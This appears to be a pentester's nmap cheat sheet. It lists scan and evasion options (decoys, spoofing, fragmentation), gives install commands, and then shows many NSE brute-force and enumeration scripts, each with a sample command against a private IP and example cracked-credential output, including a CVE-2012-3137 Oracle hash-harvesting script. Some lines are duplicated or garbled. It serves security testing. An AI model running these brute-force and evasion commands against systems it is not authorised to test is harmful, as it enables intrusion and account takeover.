As a pentester, we must understand and know what this extremely powerful tool is capable of, it can do SO Much more then just scanning ports ;-)
root@hostname: ~/ # Usage: nmap [Scan Type(s)] [Options] {target specification}
root@hostname: ~/ nmap -iL <inputfilename>: Input from list of hosts/networks
root@hostname: ~/ nmap -iR <num hosts>: Choose random targets
root@hostname: ~/ nmap --exclude <host1[,host2][,host3],...>: Exclude hosts/networks
root@hostname: ~/ nmap --excludefile <exclude_file>: Exclude list from file
root@hostname: ~/ nmap -sL: List Scan - simply list targets to scan
root@hostname: ~/ nmap -sn: Ping Scan - disable port scan
root@hostname: ~/ nmap -Pn: Treat all hosts as online -- skip host discovery
root@hostname: ~/ nmap -PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
root@hostname: ~/ nmap -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
root@hostname: ~/ nmap -PO[protocol list]: IP Protocol Ping
root@hostname: ~/ nmap -n/-R: Never do DNS resolution/Always resolve [default: sometimes]
root@hostname: ~/ nmap --dns-servers <serv1[,serv2],...>: Specify custom DNS servers
root@hostname: ~/ nmap --system-dns: Use OS's DNS resolver
root@hostname: ~/ nmap --traceroute: Trace hop path to each host
root@hostname: ~/ nmap -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
root@hostname: ~/ nmap -sU: UDP Scan
root@hostname: ~/ nmap -sN/sF/sX: TCP Null, FIN, and Xmas scans
root@hostname: ~/ nmap --scanflags <flags>: Customize TCP scan flags
root@hostname: ~/ nmap -sI <zombie host[:probeport]>: Idle scan
root@hostname: ~/ nmap -sY/sZ: SCTP INIT/COOKIE-ECHO scans
root@hostname: ~/ nmap -sO: IP protocol scan
root@hostname: ~/ nmap -b <FTP relay host>: FTP bounce scan
root@hostname: ~/ nmap -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
root@hostname: ~/ nmap -sU: UDP Scan
root@hostname: ~/ nmap -sN/sF/sX: TCP Null, FIN, and Xmas scans
root@hostname: ~/ nmap --scanflags <flags>: Customize TCP scan flags
root@hostname: ~/ nmap -sI <zombie host[:probeport]>: Idle scan
root@hostname: ~/ nmap -sY/sZ: SCTP INIT/COOKIE-ECHO scans
root@hostname: ~/ nmap -sO: IP protocol scan
root@hostname: ~/ nmap -b <FTP relay host>: FTP bounce scan
root@hostname: ~/ nmap -p <port ranges>: Only scan specified ports
root@hostname: ~/ nmap --exclude-ports <port ranges>: Exclude the specified ports from scanning
root@hostname: ~/ nmap -F: Fast mode - Scan fewer ports than the default scan
root@hostname: ~/ nmap -r: Scan ports consecutively - don't randomize
root@hostname: ~/ nmap --top-ports <number>: Scan <number> most common ports
root@hostname: ~/ nmap --port-ratio <ratio>: Scan ports more common than <ratio>
root@hostname: ~/ nmap -sV: Probe open ports to determine service/version info
root@hostname: ~/ nmap --version-intensity <level>: Set from 0 (light) to 9 (try all probes)
root@hostname: ~/ nmap --version-light: Limit to most likely probes (intensity 2)
root@hostname: ~/ nmap --version-all: Try every single probe (intensity 9)
root@hostname: ~/ nmap --version-trace: Show detailed version scan activity (for debugging)
root@hostname: ~/ nmap -sC: equivalent to --script=default
root@hostname: ~/ nmap --script=<Lua scripts>: <Lua scripts> is a comma separated list of
root@hostname: ~/ nmap --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts
root@hostname: ~/ nmap --script-args-file=filename: provide NSE script args in a file
root@hostname: ~/ nmap --script-trace: Show all data sent and received
root@hostname: ~/ nmap --script-updatedb: Update the script database.
root@hostname: ~/ nmap --script-help=<Lua scripts>: Show help about scripts.
root@hostname: ~/ nmap -O: Enable OS detection
root@hostname: ~/ nmap --osscan-limit: Limit OS detection to promising targets
root@hostname: ~/ nmap --osscan-guess: Guess OS more aggressively
####### Options which take are in seconds, or append 'ms' (milliseconds) ####### 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m)
root@hostname: ~/ nmap -T<0-5>: Set timing template (higher is faster)
root@hostname: ~/ nmap --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes
root@hostname: ~/ nmap --min-parallelism/max-parallelism <numprobes>: Probe parallelization
root@hostname: ~/ nmap --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
root@hostname: ~/ nmap --max-retries <tries>: Caps number of port scan probe retransmissions.
root@hostname: ~/ nmap --host-timeout <time>: Give up on target after this long
root@hostname: ~/ nmap --scan-delay/--max-scan-delay <time>: Adjust delay between probes
root@hostname: ~/ nmap --min-rate <number>: Send packets no slower than <number> per second
root@hostname: ~/ nmap --max-rate <number>: Send packets no faster than <number> per second
root@hostname: ~/ nmap -f; --mtu <val>: fragment packets (optionally w/given MTU)
root@hostname: ~/ nmap -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys
root@hostname: ~/ nmap -S <IP_Address>: Spoof source address
root@hostname: ~/ nmap -e <iface>: Use specified interface
root@hostname: ~/ nmap -g/--source-port <portnum>: Use given port number
root@hostname: ~/ nmap --proxies <url1,[url2],...>: Relay connections through HTTP/SOCKS4 proxies
root@hostname: ~/ nmap --data <hex string>: Append a custom payload to sent packets
root@hostname: ~/ nmap --data-string <string>: Append a custom ASCII string to sent packets
root@hostname: ~/ nmap --data-length <num>: Append random data to sent packets
root@hostname: ~/ nmap --ip-options <options>: Send packets with specified ip options
root@hostname: ~/ nmap --ttl <val>: Set IP time-to-live field
root@hostname: ~/ nmap --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address
root@hostname: ~/ nmap --badsum: Send packets with a bogus TCP/UDP/SCTP checksum
root@hostname: ~/ nmap -6: Enable IPv6 scanning
root@hostname: ~/ nmap -A: Enable OS detection, version detection, script scanning, and traceroute
root@hostname: ~/ nmap --datadir <dirname>: Specify custom Nmap data file location
root@hostname: ~/ nmap --send-eth/--send-ip: Send using raw ethernet frames or IP packets
root@hostname: ~/ nmap --privileged: Assume that the user is fully privileged
root@hostname: ~/ nmap --unprivileged: Assume the user lacks raw socket privileges
root@hostname: ~/ nmap -V: Print version number
root@hostname: ~/ nmap -h: Print this help summary page.
Enable all useflags for get all features availabe, zenmap is required if you want include the GUI for NMAP
echo "net-analyzer/nmap libssh2 ncat ndiff nmap-update nping system-lua zenmap" >> /etc/portage/package.use/nmap
emerge --ask net-analyzer/nmap
apt -qq install nmap -y
apt -qq install nmap -y
apt -qq install nmap -y
Download: https://nmap.org/dist/nmap-7.70-setup.exe
Place the file in a folder, open properties and copy the location of nmap, open powershell and now
cd <location of nmap>
nmap --help
zypper addrepo https://download.opensuse.org/repositories/network:utilities/openSUSE_Leap_42.3/network:utilities.repo
zypper addrepo https://download.opensuse.org/repositories/network:utilities/openSUSE_Leap_15.1/network:utilities.repo
zypper addrepo https://download.opensuse.org/repositories/network:utilities/openSUSE_Leap_15.0/network:utilities.repo
zypper addrepo https://download.opensuse.org/repositories/network:utilities/openSUSE_Factory_PowerPC/network:utilities.repo
zypper addrepo https://download.opensuse.org/repositories/network:utilities/openSUSE_Factory_ARM/network:utilities.repo
zypper addrepo https://download.opensuse.org/repositories/network:utilities/openSUSE_Factory/network:utilities.repo
zypper refresh zypper install nmap
root@hostname: ~/ # nmap --script-updatedb
Performs password guessing against Apple Filing Protocol (AFP)
root@hostname: ~/ # nmap -p 548 --script afp-brute 192.168.1.12
|PORT STATE SERVICE
|548/tcp open afp
| afp-brute:
|_ admin:KenSentMe => Valid credentials
Performs brute force passwords auditing against the Apache JServ protocol. The Apache JServ Protocol is commonly used by web servers to communicate with back-end Java application server containers
root@hostname: ~/ # nmap -p 8009 192.168.1.12 --script ajp-brute
|PORT STATE SERVICE
|8009/tcp open ajp13
| ajp-brute:
| Accounts
| root:secret - Valid credentials
| Statistics
|_ Performed 1946 guesses in 23 seconds, average tps: 82
root@hostname: ~/ # nmap -sU --script backorifice-brute 192.168.1.12 --script-args backorifice-brute.
|PORT STATE SERVICE
|31337/udp open BackOrifice
| backorifice-brute:
| Accounts:
| michael => Valid credentials
| Statistics
|_ Perfomed 60023 guesses in 467 seconds, average tps: 138
Performs Brute-Force password auditing against the Cassandra database
root@hostname: ~/ # nmap -p 9160 192.168.1.12 --script=cassandra-brute
|PORT STATE SERVICE VERSION
|9160/tcp open apani1?
| cassandra-brute:
| Accounts
| admin:lover - Valid credentials
| admin:lover - Valid credentials
| Statistics
|_ Performed 4581 guesses in 1 seconds, average tps: 4581
CICS transaction ID enumerator for IBM mainframes This script is based on mainframe_brute by Dominic White (https://github_com/sensepost/mainframe_brute)_ However, this script doesn't rely on any third party libraries or tools and instead uses the NSE TN3270 library which emulates a TN3270 screen in lua_
root@hostname: ~/ # nmap --script=cics-enum -p 23 <targets>
root@hostname: ~/ # nmap --script=cics-enum --script-args=idlist=default_cics.txt,cics-enum.command="exit;logon applid(cics42)",cics-enum.path="/home/dade/screenshots/",cics-enum.noSSL=true -p 23 <targets>
|PORT STATE SERVICE
|23/tcp open tn3270
| cics-enum:
| Accounts:
| CBAM: Valid - CICS Transaction ID
| CETR: Valid - CICS Transaction ID
| CEST: Valid - CICS Transaction ID
| CMSG: Valid - CICS Transaction ID
| CEDA: Valid - CICS Transaction ID
| CEDF: Potentially Valid - CICS Transaction ID
| DSNC: Valid - CICS Transaction ID
|_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0
CICS User ID brute forcing script for the CESL login screen
root@hostname: ~/ # nmap --script=cics-user-brute -p 23 <targets>
root@hostname: ~/ # nmap --script=cics-user-brute --script-args userdb=users.txt cics-user-brute.commands="exit;logon applid(cics42)" -p 23 <targets>
|PORT STATE SERVICE
|23/tcp open tn3270
| cics-user-brute:
| Accounts:
| PLAGUE: Valid - CICS User ID
|_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0
CICS User ID enumeration script for the CESL/CESN Login screen
root@hostname: ~/ # nmap --script=cics-user-enum -p 23 <targets>
root@hostname: ~/ # nmap --script=cics-user-enum --script-args userdb=users_txt cics-user-enum_commands="exit;logon applid(cics42)" -p 23 <targets>
|PORT STATE SERVICE
|23/tcp open tn3270
| cics-user-enum:
| Accounts:
| PLAGUE: Valid - CICS User ID
|_ Statistics: Performed 31 guesses in 114 seconds, average tps: 0
Attempts to guess valid credentials for the Citrix PN Web Agent XML Service The XML service authenticates against the local Windows server or the Active Directory_
root@hostname: ~/ # nmap --script=citrix - Brute-Force-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443,8080 192.168.1.12
|PORT STATE SERVICE REASON
|8080/tcp open http-proxy syn-ack
| citrix-brute-xml:
| Joe:password => Must change password at next logon
| Luke:summer => Login was successful
|_ Jane:secret => Account is disabled
Performs Brute-Force password auditing against CVS pserver authentication
root@hostname: ~/ # nmap -p 2401 --script cvs-brute 192.168.1.12
|2401/tcp open cvspserver syn-ack
| cvs-brute:
| Accounts
| hotchner:francisco - Account is valid
| reid:secret - Account is valid
| Statistics
|_ Performed 544 guesses in 14 seconds, average tps: 38
Attempts to guess the name of the CVS repositories hosted on the remote server With knowledge of the correct repository name, usernames and passwords can be guessed_
root@hostname: ~/ # nmap -p 2401 --script cvs-brute-repository 192.168.1.12
|PORT STATE SERVICE REASON
|2401/tcp open cvspserver syn-ack
| cvs-brute-repository:
| Repositories
| /myrepos
| /demo
| Statistics
|_ Performed 14 guesses in 1 seconds, average tps: 14
Performs Brute-Force password auditing against the DelugeRPC daemon
root@hostname: ~/ # nmap --script deluge-rpc-brute -p 58846 192.168.1.12
|PORT STATE SERVICE REASON TTL
|58846/tcp open unknown syn-ack 0
| deluge-rpc-brute:
| Accounts
| admin:default - Valid credentials
| Statistics
|_ Performed 8 guesses in 1 seconds, average tps: 8
Performs Brute-Force password auditing against the Lotus Domino Console
root@hostname: ~/ # nmap --script domcon-brute -p 2050 192.168.1.12
|PORT STATE SERVICE REASON
|2050/tcp open unknown syn-ack
| domcon-brute:
| Accounts
|_ patrik karlsson:secret => Login correct
Performs Brute-Force password auditing against an iPhoto Library
root@hostname: ~/ # nmap --script dpap-brute -p 8770 192.168.1.12
|PORT STATE SERVICE REASON
|8770/tcp open apple-iphoto syn-ack
| dpap-brute:
| Accounts
| secret => Login correct
| Statistics
|_ Perfomed 5007 guesses in 6 seconds, average tps: 834
Performs password guessing against databases sup |PORTing the IBM DB2 protocol such as Informix, DB2 and Derby
root@hostname: ~/ # nmap -p 50000 --script drda-brute 192.168.1.12
|PORT STATE SERVICE REASON
|50000/tcp open drda
| drda-brute:
|_ db2admin:db2admin => Valid credentials
Performs Brute-Force password auditing against FTP servers
root@hostname: ~/ # nmap --script ftp-brute -p 21 192.168.1.12
|PORT STATE SERVICE
|21/tcp open ftp
| ftp-brute:
| Accounts
| root:root - Valid credentials
| Statistics
|_ Performed 510 guesses in 610 seconds, average tps: 0
Performs Brute-Force password auditing against http basic, digest and ntlm authentication
root@hostname: ~/ # nmap --script http-brute -p 80 192.168.1.12
|PORT STATE SERVICE REASON
|80/tcp open http syn-ack
| http-brute:
| Accounts:
| user:user - Valid credentials
|_ Statistics: Performed 123 guesses in 1 seconds, average tps: 123
Performs Brute-Force password auditing against http form-based authentication
root@hostname: ~/ # nmap --script http-form-brute -p 80 192.168.1.12
|PORT STATE SERVICE REASON
|80/tcp open http syn-ack
| http-form-brute:
| Accounts
| Patrik Karlsson:secret - Valid credentials
| Statistics
|_ Perfomed 60023 guesses in 467 seconds, average tps: 138
Attempts to Brute-Force the 8_3 filenames (commonly known as short names) of files and directories in the root folder of vulnerable IIS servers This script is an implementation of the PoC "iis shortname scanner"_
root@hostname: ~/ # nmap -p80 --script http-iis-short-name-brute 192.168.1.12
|PORT STATE SERVICE
|80/tcp open http
| http-iis-short-name-brute:
| VULNERABLE:
| Microsoft IIS tilde character "~" short name disclosure and denial of service
| State: VULNERABLE (Exploitable)
| Description:
| Vulnerable IIS servers disclose folder and file names with a Windows 8.3 naming scheme inside the webroot folder.
| Shortnames can be used to guess or brute force sensitive filenames. Attackers can exploit this vulnerability to
| cause a denial of service condition.
|
| Extra information:
|
| 8.3 filenames found:
| Folders
| admini~1
| Files
| backup~1.zip
| certsb~2.zip
| siteba~1.zip
|
| References:
| http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
|_ https://github.com/irsdl/IIS-ShortName-Scanner
Performs Brute-Force password auditing against Joomla web CMS installations
root@hostname: ~/ # nmap -sV --script http-joomla-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,http-joomla-brute.threads=3,brute.firstonly=true' 192.168.1.12
|PORT STATE SERVICE REASON
|80/tcp open http syn-ack
| http-joomla-brute:
| Accounts
| xdeadbee:i79eWBj07g => Login correct
| Statistics
|_ Perfomed 499 guesses in 301 seconds, average tps: 0
Performs Brute-Force password guessing against HTTP proxy servers
root@hostname: ~/ # nmap --script http-proxy-brute -p 8080 192.168.1.12
|PORT STATE SERVICE
|8080/tcp open http-proxy
| http-proxy-brute:
| Accounts
| patrik:12345 - Valid credentials
| Statistics
|_ Performed 6 guesses in 2 seconds, average tps: 3
Performs Brute-Force password auditing against Wordpress CMS/blog installations
root@hostname: ~/ # nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.12
|PORT STATE SERVICE REASON
|80/tcp open http syn-ack
| http-wordpress-brute:
| Accounts
| 0xdeadb33f:god => Login correct
| Statistics
|_ Perfomed 103 guesses in 17 seconds, average tps: 6
Performs Brute-Force password auditing against the Asterisk IAX2 protocol Guessing fails when a large number of attempts is made due to the maxcallnumber limit (default 2048)_ In case your getting "ERROR: Too many retries, aborted _" after a while, this is most likely what's happening In order to avoid this problem try: - reducing the size of your dictionary - use the brute delay option to introduce a delay between guesses - split the guessing up in chunks and wait for a while between them
root@hostname: ~ nmap -sU -p 4569 192.168.1.12 --script iax2-brute
| PORT STATE SERVICE
|4569/udp open |filtered unknown
| iax2-brute:
| Accounts
| 1002:password12 - Valid credentials
| Statistics
_ Performed 1850 guesses in 2 seconds, average tps: 925
Performs Brute-Force password auditing against IMAP servers using either LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5 or NTLM authentication
root@hostname: ~/ # nmap -p 143,993 --script imap-brute 192.168.1.12
|PORT STATE SERVICE REASON
|143/tcp open imap syn-ack
| imap-brute:
| Accounts
| braddock:jules - Valid credentials
| lane:sniper - Valid credentials
| parker:scorpio - Valid credentials
| Statistics
|_ Performed 62 guesses in 10 seconds, average tps: 6
Tests for the presence of the LibreOffice Impress Remote server Checks if a PIN is valid if provided and will bruteforce the PIN if requested_
root@hostname: ~/ # nmap -p 1599 --script impress-remote-discover 192.168.1.12
|PORT STATE SERVICE Version
|1599/tcp open impress-remote LibreOffice Impress remote 4.3.3.2
| impress-remote-discover:
| Impress Version: 4.3.3.2
| Remote PIN: 0000
|_ Client Name used: Firefox OS
Performs Brute-Force password auditing against IBM Informix Dynamic Server
root@hostname: ~/ # nmap --script informix-brute -p 9088 192.168.1.12
|PORT STATE SERVICE
|9088/tcp open unknown
| informix-brute:
| Accounts
| ifxnoob:ifxnoob => Valid credentials
| Statistics
|_ Perfomed 25024 guesses in 75 seconds, average tps: 320
x The Driver class contains the driver implementation used by the brute library
Performs Brute-Force password auditing against IPMI RPC server
root@hostname: ~/ # nmap -sU --script ipmi-brute -p 623 192.168.1.12
|PORT STATE SERVICE REASON
|623/udp open |filtered unknown
| ipmi-brute:
| Accounts
|_ admin:admin => Valid credentials
Performs Brute-Force password auditing against IRC (Internet Relay Chat) servers
root@hostname: ~/ # nmap --script irc-brute -p 6667 192.168.1.12
|PORT STATE SERVICE
|6667/tcp open irc
| irc-brute:
| Accounts
| password - Valid credentials
| Statistics
|_ Performed 1927 guesses in 36 seconds, average tps: 74
Performs Brute-Force password auditing against IRC (Internet Relay Chat) servers sup |PORTing SASL authentication
root@hostname: ~/ # nmap --script irc-sasl-brute -p 6667 192.168.1.12
|PORT STATE SERVICE REASON
|6667/tcp open irc syn-ack
| irc-sasl-brute:
| Accounts
| root:toor - Valid credentials
| Statistics
|_ Performed 60 guesses in 29 seconds, average tps: 2
Performs Brute-Force password auditing against iSCSI targets
root@hostname: ~/ # nmap -sV --script=iscsi-brute 192.168.1.12
|PORT STATE SERVICE
|3260/tcp open iscsi syn-ack
| iscsi-brute:
| Accounts
| user:password123456 => Valid credentials
| Statistics
|_ Perfomed 5000 guesses in 7 seconds, average tps: 714
Attempts to brute-force LDAP authentication By default it uses the built-in username and password lists_ In order to use your own lists use the userdb and passdb script arguments_
root@hostname: ~/ # nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' 192.168.1.12
|389/tcp open ldap
| ldap-brute:
|_ ldaptest:ldaptest => Valid credentials
| restrict.ws:restricted1 => Valid credentials, account cannot log in from current host
| restrict.time:restricted1 => Valid credentials, account cannot log in at current time
| valid.user:valid1 => Valid credentials
| expired.user:expired1 => Valid credentials, account expired
| disabled.user:disabled1 => Valid credentials, account disabled
|_ must.change:need2change => Valid credentials, password must be changed at next logon
Attempts to enumerate Logical Units (LU) of TN3270E servers
root@hostname: ~/ # nmap --script lu-enum --script-args lulist=lus.txt,lu-enum.path="/home/dade/screenshots/" -p 23 -sV <targets>
|PORT STATE SERVICE REASON VERSION
|23/tcp open tn3270 syn-ack IBM Telnet TN3270 (TN3270E)
| lu-enum:
| Logical Units:
| LU:BSLVLU69 - Valid credentials
|_ Statistics: Performed 7 guesses in 7 seconds, average tps: 1.0
Performs Brute-Force password auditing against Couchbase Membase servers
root@hostname: ~/ # nmap -p 11211 --script membase-brute
|PORT STATE SERVICE
|11211/tcp open unknown
| membase-brute:
| Accounts
| buckettest:toledo - Valid credentials
| Statistics
|_ Performed 5000 guesses in 2 seconds, average tps: 2500
Performs Brute-Force username and password auditing against Metasploit msgrpc interface
Performs Brute-Force password auditing against a Metasploit RPC server using the XMLRPC protocol
root@hostname: ~/ # nmap --script metasploit-msgrpc-brute -p 55553 192.168.1.12
|PORT STATE SERVICE REASON
|55553/tcp open unknown syn-ack
| metasploit-msgrpc-brute:
| Accounts
| root:root - Valid credentials
| Statistics
|_ Performed 10 guesses in 10 seconds, average tps: 1
Performs Brute-Force password auditing against Mikrotik RouterOS devices with the API RouterOS interface enabled
root@hostname: ~/ # nmap -p8728 --script mikrotik-routeros-brute 192.168.1.12
|PORT STATE SERVICE REASON
|8728/tcp open unknown syn-ack
| mikrotik-routeros-brute:
| Accounts
| admin:dOsmyvsvJGA967eanX - Valid credentials
| Statistics
|_ Performed 60 guesses in 602 seconds, average tps: 0
Performs Brute-Force password auditing against the RPA Tech Mobile Mouse servers
root@hostname: ~/ # nmap --script mmouse-brute -p 51010 192.168.1.12
|PORT STATE SERVICE
|51010/tcp open unknown
| mmouse-brute:
| Accounts
| vanilla - Valid credentials
| Statistics
|_ Performed 1199 guesses in 23 seconds, average tps: 47
_ Performs Brute-Force password auditing against the MongoDB database_
root@hostname: ~/ # nmap -p 27017 192.168.1.12 --script mongodb-brute
|PORT STATE SERVICE
|27017/tcp open mongodb
| mongodb-brute:
| Accounts
| root:Password1 - Valid credentials
| Statistics
|_ Performed 3542 guesses in 9 seconds, average tps: 393
Performs password guessing against Microsoft SQL Server (ms-sql) Works best in conjunction with the broadcast-ms-sql-discover script_
root@hostname: ~/ # nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt 192.168.1.12
root@hostname: ~/ # nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.12
|PORT STATE SERVICE REASON
| ms-sql-brute:
| [192.168.100.128\TEST]
| No credentials found
| Warnings:
| sa: AccountLockedOut
| [192.168.100.128\PROD]
| Credentials found:
| webshop_reader:secret => Login Success
| testuser:secret1234 => PasswordMustChange
|_ lordvader:secret1234 => Login Success
Performs password guessing against MySQL
root@hostname: ~/ # nmap --script=mysql-brute 192.168.1.12
|PORT STATE SERVICE REASON
|3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
Performs valid-user enumeration against MySQL server using a bug discovered and published by Kingcope (http://seclists_org/fulldisclosure/2012/Dec/9)
root@hostname: ~/ # nmap --script=mysql-enum 192.168.1.12
|PORT STATE SERVICE REASON
|3306/tcp open mysql syn-ack
| mysql-enum:
| Accounts
| admin:<empty> - Valid credentials
| test:<empty> - Valid credentials
| test_mysql:<empty> - Valid credentials
| Statistics
|_ Performed 11 guesses in 1 seconds, average tps: 11
Performs Brute-Force password auditing against a Nessus vulnerability scanning daemon using the NTP 1_2 protocol
root@hostname: ~/ #
|PORT STATE SERVICE
|1241/tcp open nessus
| nessus-brute:
| Accounts
| nessus:nessus - Valid credentials
| Statistics
|_ Performed 35 guesses in 75 seconds, average tps: 0
This script does not appear to perform well when run using multiple threads Although, it's very slow running under a single thread it does work as intended
Performs Brute-Force password auditing against a Nessus vulnerability scanning daemon using the XMLRPC protocol
root@hostname: ~/ # nmap -sV --script=nessus-xmlrpc-brute 192.168.1.12
|PORT STATE SERVICE REASON
|8834/tcp open unknown syn-ack
| nessus-xmlrpc-brute:
| Accounts
| nessus:nessus - Valid credentials
| Statistics
|_ Performed 1933 guesses in 26 seconds, average tps: 73
Performs Brute-Force password auditing against the Netbus backdoor ("remote administration") service
root@hostname: ~/ # nmap -p 12345 --script netbus-brute 192.168.1.12
|12345/tcp open netbus
|_netbus-brute: password123
Performs Brute-Force password auditing against a Nexpose vulnerability scanner using the API 1_1
root@hostname: ~/ # nmap --script nexpose-brute -p 3780 192.168.1.12
|PORT STATE SERVICE REASON VERSION
|3780/tcp open ssl/nexpose syn-ack NeXpose NSC 0.6.4
| nexpose-brute:
| Accounts
| nxadmin:nxadmin - Valid credentials
| Statistics
|_ Performed 5 guesses in 1 seconds, average tps: 5
z/OS JES Network Job Entry (NJE) target node name Brute-Force
root@hostname: ~/ # nmap -sV --script=nje-node-brute 192.168.1.12
root@hostname: ~/ # nmap --script=nje-node-brute --script-args=hostlist=nje_names.txt -p 175 192.168.1.12
|PORT STATE SERVICE REASON
|175/tcp open nje syn-ack
| nje-node-brute:
| Node Name:
| POTATO:CACTUS - Valid credentials
|_ Statistics: Performed 6 guesses in 14 seconds, average tps: 0
z/OS JES Network Job Entry (NJE) 'I record' password Brute-Forcer
root@hostname: ~/ # nmap -sV --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS' 192.168.1.12
root@hostname: ~/ # nmap --script=nje-pass-brute --script-args=ohost='POTATO',rhost='CACTUS',sleep=5 -p 175 192.168.1.12
|PORT STATE SERVICE VERSION
|175/tcp open nje IBM Network Job Entry (JES)
| nje-pass-brute:
| NJE Password:
| Password:A - Valid credentials
|_ Statistics: Performed 8 guesses in 12 seconds, average tps: 0
Performs Brute-Force password auditing against an Nping Echo service
root@hostname: ~/ # nmap -p 9929 --script nping-brute 192.168.1.12
|9929/tcp open nping-echo
| nping-brute:
| Accounts
| 123abc => Valid credentials
| Statistics
|_ Perfomed 204 guesses in 204 seconds, average tps: 1
Performs Brute-Force password auditing against the OpenVAS manager using OMPv2
root@hostname: ~/ # nmap -p 9390 --script omp2-brute 192.168.1.12
|PORT STATE SERVICE REASON
|9390/tcp open openvas syn-ack
| omp2-brute:
| Accounts
|_ admin:secret => Valid credentials
Performs Brute-Force password auditing against a OpenVAS vulnerability scanner daemon using the OTP 1_0 protocol
root@hostname: ~/ # nmap -sV --script=openvas-otp-brute 192.168.1.12
PORT STATE SERVICE REASON VERSION |9391/tcp open ssl/openvas syn-ack | openvas-otp-brute: | Accounts | openvas:openvas - Valid credentials | Statistics '-.> Performed 4 guesses in 4 seconds, average tps: 1
Performs Brute-Force password auditing against Oracle servers
root@hostname: ~/ # nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL 192.168.1.12
|PORT STATE SERVICE REASON
|1521/tcp open oracle syn-ack
| oracle-brute:
| Accounts
| system:powell => Account locked
| haxxor:haxxor => Valid credentials
| Statistics
|_ Perfomed 157 guesses in 8 seconds, average tps: 19
Exploits the CVE-2012-3137 vulnerability, a weakness in Oracle's O5LOGIN authentication scheme The vulnerability exists in Oracle 11g R1/R2 and allows linking the session key to a password hash_ When initiating an authentication attempt as a valid user the server will respond with a session key and salt_ Once received the script will disconnect the connection thereby not recording the login attempt_ The session key and salt can then be used to Brute-Force the users password_
root@hostname: ~/ # nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL 192.168.1.12
|PORT STATE SERVICE REASON
|1521/tcp open oracle syn-ack
| oracle-brute-stealth:
| Accounts
| dummy:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - Hashed valid or invalid credentials
| nmap:$o5logon$D1B28967547DBA3917D7B129E339F96156C8E2FE5593D42540992118B3475214CA0F6580FD04C2625022054229CAAA8D*7BCF2ACF08F15F75B579 - Hashed valid or invalid credentials
| Statistics
|_ Performed 2 guesses in 1 seconds, average tps: 2
Guesses Oracle instance/SID names against the TNS-listener
root@hostname: ~/ # nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 192.168.1.12
root@hostname: ~/ # nmap --script=oracle-sid-brute -p 1521-1560 192.168.1.12
|PORT STATE SERVICE REASON
|1521/tcp open oracle syn-ack
| oracle-sid-brute:
| orcl
| prod
|_ devel
Performs Brute-Force password auditing against the pcAnywhere remote access protocol
root@hostname: ~/ # nmap --script=pcanywhere-brute 192.168.1.12
|5631/tcp open pcanywheredata syn-ack
| pcanywhere-brute:
| Accounts
| administrator:administrator - Valid credentials
| Statistics
|_ Performed 2 guesses in 55 seconds, average tps: 0
Performs password guessing against PostgreSQL
root@hostname: ~/ # nmap -p 5432 --script pgsql-brute 192.168.1.12
|5432/tcp open pgsql
| pgsql-brute:
| root:<empty> => Valid credentials
|_ test:test => Valid credentials
Tries to log into a POP3 account by guessing usernames and passwords
root@hostname: ~/ # nmap -sV --script=pop3-brute 192.168.1.12
|PORT STATE SERVICE
|110/tcp open pop3
| pop3-brute- |PORTed:
| Accounts:
| user:pass => Login correct
| Statistics:
|_ Performed 8 scans in 1 seconds, average tps: 8
Performs Brute-Force passwords auditing against a Redis key-value store
root@hostname: ~/ # nmap -p 6379 192.168.1.12 --script redis-brute
|PORT STATE SERVICE
|6379/tcp open unknown
| redis-brute:
| Accounts
| toledo - Valid credentials
| Statistics
|_ Performed 5000 guesses in 3 seconds, average tps: 1666
Performs Brute-Force password auditing against the classic UNIX rexec (remote exec) service
root@hostname: ~/ # nmap -p 512 --script rexec-brute 192.168.1.12
|PORT STATE SERVICE
|512/tcp open exec
| rexec-brute:
| Accounts
| nmap:test - Valid credentials
| Statistics
|_ Performed 16 guesses in 7 seconds, average tps: 2
Performs Brute-Force password auditing against the classic UNIX rlogin (remote login) service This script must be run in privileged mode on UNIX because it must bind to a low source |PORT number_
root@hostname: ~/ # nmap -p 513 --script rlogin-brute 192.168.1.12
|PORT STATE SERVICE
|513/tcp open login
| rlogin-brute:
| Accounts
| nmap:test - Valid credentials
| Statistics
|_ Performed 4 guesses in 5 seconds, average tps: 0
Performs Brute-Force password auditing against the WinPcap Remote Capture Daemon (rpcap)
root@hostname: ~/ # nmap -p 2002 192.168.1.12 --script rpcap-brute
|PORT STATE SERVICE REASON
|2002/tcp open globe syn-ack
| rpcap-brute:
| Accounts
| monkey:Password1 - Valid credentials
| Statistics
|_ Performed 3540 guesses in 3 seconds, average tps: 1180
Performs Brute-Force password auditing against the rsync remote file syncing protocol
